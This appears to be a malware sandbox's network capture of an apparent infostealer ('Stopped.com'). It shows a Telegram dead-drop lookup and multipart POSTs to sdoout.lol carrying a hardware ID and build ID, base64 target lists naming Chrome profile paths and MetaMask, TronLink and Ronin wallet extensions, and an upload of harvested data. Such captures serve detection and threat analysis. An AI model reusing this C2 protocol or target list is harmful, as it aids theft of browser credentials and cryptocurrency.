Dec 31, 2024 16:57:47.004898071 CET	1.1.1.1	192.168.2.4	0xd9dd	No error (0)	play.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

sdoout.lol

www.google.com

play.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	149.154.167.99	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:31 UTC	85	OUT	GET /w211et HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:31 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 31 Dec 2024 15:57:31 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12299 Connection: close Set-Cookie: stel_ssid=c1137fc641921cab6a_18304823293708246609; expires=Wed, 01 Jan 2025 15:57:31 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-12-31 15:57:31 UTC	12299	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 77 32 31 31 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @w211et</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:32 UTC	183	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:57:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:33 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----sjeknyus2nop8yuai5pz User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:33 UTC	255	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 73 6a 65 6b 6e 79 75 73 32 6e 6f 70 38 79 75 61 69 35 70 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 36 34 39 41 31 30 35 39 35 46 35 35 32 38 31 35 38 36 33 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 73 6a 65 6b 6e 79 75 73 32 6e 6f 70 38 79 75 61 69 35 70 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 73 6a 65 6b 6e 79 75 73 32 6e 6f 70 38 79 75 61 69 35 70 7a 2d 2d 0d 0a Data Ascii: ------sjeknyus2nop8yuai5pzContent-Disposition: form-data; name="hwid"C8649A10595F552815863-a33c7340-61ca------sjeknyus2nop8yuai5pzContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------sjeknyus2nop8yuai5pz--
2024-12-31 15:57:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:57:34 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|0b25a52729f35cc825e8e3d5295163e5\|1\|0\|1\|1\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:34 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----9zcba1nym7gv3e3oh47g User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:34 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 39 7a 63 62 61 31 6e 79 6d 37 67 76 33 65 33 6f 68 34 37 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 39 7a 63 62 61 31 6e 79 6d 37 67 76 33 65 33 6f 68 34 37 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 39 7a 63 62 61 31 6e 79 6d 37 67 76 33 65 33 6f 68 34 37 67 0d 0a 43 6f 6e 74 Data Ascii: ------9zcba1nym7gv3e3oh47gContent-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------9zcba1nym7gv3e3oh47gContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------9zcba1nym7gv3e3oh47gCont
2024-12-31 15:57:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:57:35 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:36 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----wlxlfkfukfusjmym7qq9 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:36 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 77 6c 78 6c 66 6b 66 75 6b 66 75 73 6a 6d 79 6d 37 71 71 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 77 6c 78 6c 66 6b 66 75 6b 66 75 73 6a 6d 79 6d 37 71 71 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 77 6c 78 6c 66 6b 66 75 6b 66 75 73 6a 6d 79 6d 37 71 71 39 0d 0a 43 6f 6e 74 Data Ascii: ------wlxlfkfukfusjmym7qq9Content-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------wlxlfkfukfusjmym7qq9Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------wlxlfkfukfusjmym7qq9Cont
2024-12-31 15:57:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:57:36 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:37 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----cjwbaas0hvs2nyc2ng47 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:37 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 63 6a 77 62 61 61 73 30 68 76 73 32 6e 79 63 32 6e 67 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 63 6a 77 62 61 61 73 30 68 76 73 32 6e 79 63 32 6e 67 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 63 6a 77 62 61 61 73 30 68 76 73 32 6e 79 63 32 6e 67 34 37 0d 0a 43 6f 6e 74 Data Ascii: ------cjwbaas0hvs2nyc2ng47Content-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------cjwbaas0hvs2nyc2ng47Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------cjwbaas0hvs2nyc2ng47Cont
2024-12-31 15:57:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:57:38 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:38 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1v3ekxb16p8qqq90r168 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 6913 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:38 UTC	6913	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 76 33 65 6b 78 62 31 36 70 38 71 71 71 39 30 72 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 31 76 33 65 6b 78 62 31 36 70 38 71 71 71 39 30 72 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 31 76 33 65 6b 78 62 31 36 70 38 71 71 71 39 30 72 31 36 38 0d 0a 43 6f 6e 74 Data Ascii: ------1v3ekxb16p8qqq90r168Content-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------1v3ekxb16p8qqq90r168Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------1v3ekxb16p8qqq90r168Cont
2024-12-31 15:57:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:57:39 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:39 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1v3ekxb16p8qqq90r168 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:39 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 76 33 65 6b 78 62 31 36 70 38 71 71 71 39 30 72 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 31 76 33 65 6b 78 62 31 36 70 38 71 71 71 39 30 72 31 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 31 76 33 65 6b 78 62 31 36 70 38 71 71 71 39 30 72 31 36 38 0d 0a 43 6f 6e 74 Data Ascii: ------1v3ekxb16p8qqq90r168Content-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------1v3ekxb16p8qqq90r168Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------1v3ekxb16p8qqq90r168Cont
2024-12-31 15:57:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:57:40 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49751	172.217.16.196	443	7476	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:42 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-31 15:57:42 UTC	1266	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 15:57:42 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-IZ-iRwde6gaUMEs8LeNsFg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-31 15:57:42 UTC	124	IN	Data Raw: 36 35 63 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 69 6e 6e 65 73 6f 74 61 20 76 69 6b 69 6e 67 73 22 2c 22 74 65 78 61 73 20 76 65 68 69 63 6c 65 20 69 6e 73 70 65 63 74 69 6f 6e 73 22 2c 22 6d 65 78 69 63 6f 20 74 65 71 75 69 6c 61 20 6c 61 6b 65 22 2c 22 74 20 63 6f 72 6f 6e 61 65 20 62 6f 72 65 61 6c 69 73 20 6e 6f 76 61 22 2c 22 72 6f 62 6c 6f 78 20 6a 75 6a 75 74 Data Ascii: 65c)]}'["",["minnesota vikings","texas vehicle inspections","mexico tequila lake","t coronae borealis nova","roblox jujut
2024-12-31 15:57:42 UTC	1390	IN	Data Raw: 73 75 20 69 6e 66 69 6e 69 74 65 20 63 6f 64 65 73 22 2c 22 6e 6f 73 66 65 72 61 74 75 20 6d 6f 76 69 65 20 62 6f 78 20 6f 66 66 69 63 65 22 2c 22 61 75 72 6f 72 61 20 62 6f 72 65 61 6c 69 73 20 6e 6f 72 74 68 65 72 6e 20 6c 69 67 68 74 73 20 66 6f 72 65 63 61 73 74 22 2c 22 73 6f 6c 64 69 65 72 20 73 61 6c 75 74 65 20 74 72 61 63 6b 77 72 65 73 74 6c 69 6e 67 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 Data Ascii: su infinite codes","nosferatu movie box office","aurora borealis northern lights forecast","soldier salute trackwrestling"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZX
2024-12-31 15:57:42 UTC	121	IN	Data Raw: 64 45 74 44 61 32 34 79 4e 48 5a 47 53 32 74 78 61 44 42 50 53 57 39 45 53 31 5a 50 52 45 4e 31 62 6b 4a 4c 63 6c 68 4c 55 53 74 70 54 33 6c 77 4d 58 63 72 62 46 41 72 5a 55 4a 36 55 33 42 44 61 47 74 6d 55 56 5a 61 52 6b 78 7a 52 6b 5a 54 52 46 55 72 62 32 35 7a 4f 55 74 4c 4d 32 78 54 4d 6b 35 4e 63 33 6c 43 53 47 78 36 57 57 39 43 53 6c 56 53 4d 45 59 0d 0a Data Ascii: dEtDa24yNHZGS2txaDBPSW9ES1ZPREN1bkJLclhLUStpT3lwMXcrbFArZUJ6U3BDaGtmUVZaRkxzRkZTRFUrb25zOUtLM2xTMk5Nc3lCSGx6WW9CSlVSMEY
2024-12-31 15:57:42 UTC	90	IN	Data Raw: 35 34 0d 0a 76 64 30 4a 51 55 33 70 53 4e 69 39 4e 51 57 74 7a 59 6b 5a 74 53 58 56 4d 5a 31 6c 35 59 58 46 77 4d 46 56 6d 4f 56 56 6b 4d 30 4e 45 53 57 34 34 4d 46 4e 35 59 6c 64 4f 4d 47 78 72 54 55 68 4a 61 45 35 4f 61 56 42 44 57 56 56 30 4e 6c 6c 33 65 46 4e 0d 0a Data Ascii: 54vd0JQU3pSNi9NQWtzYkZtSXVMZ1l5YXFwMFVmOVVkM0NESW44MFN5YldOMGxrTUhJaE5OaVBDWVV0Nll3eFN
2024-12-31 15:57:42 UTC	1390	IN	Data Raw: 31 30 65 35 0d 0a 75 56 55 5a 54 52 58 42 43 53 53 39 50 56 6b 70 58 4e 47 5a 5a 63 56 52 5a 51 58 46 31 52 33 63 33 65 58 56 56 55 45 67 78 63 47 5a 58 64 45 77 34 61 6b 35 61 55 45 6f 30 4c 30 74 5a 4e 31 52 49 62 6e 5a 33 65 45 6c 68 52 48 68 73 61 47 64 47 53 33 6c 52 54 46 52 58 65 58 56 58 61 6a 68 70 56 6b 51 31 4f 46 4a 48 56 55 4e 4e 63 6e 52 6f 4f 48 4e 6b 53 7a 52 57 5a 31 6b 76 52 6e 4e 42 4c 32 74 77 62 56 4d 77 61 6b 39 4d 59 32 77 31 54 57 68 59 64 7a 42 77 54 57 74 4c 53 31 55 77 51 58 55 33 54 6d 4d 78 63 6a 56 6e 51 56 46 55 64 48 4e 4c 4e 45 31 6a 61 32 64 42 56 6e 68 31 4e 54 64 32 4d 33 6c 78 5a 44 46 43 4e 56 56 79 51 30 31 68 53 46 64 54 4e 30 4a 74 5a 57 5a 46 4e 32 74 4c 61 33 4a 75 54 30 63 78 54 30 74 32 5a 45 6c 69 4b 33 5a 78 Data Ascii: 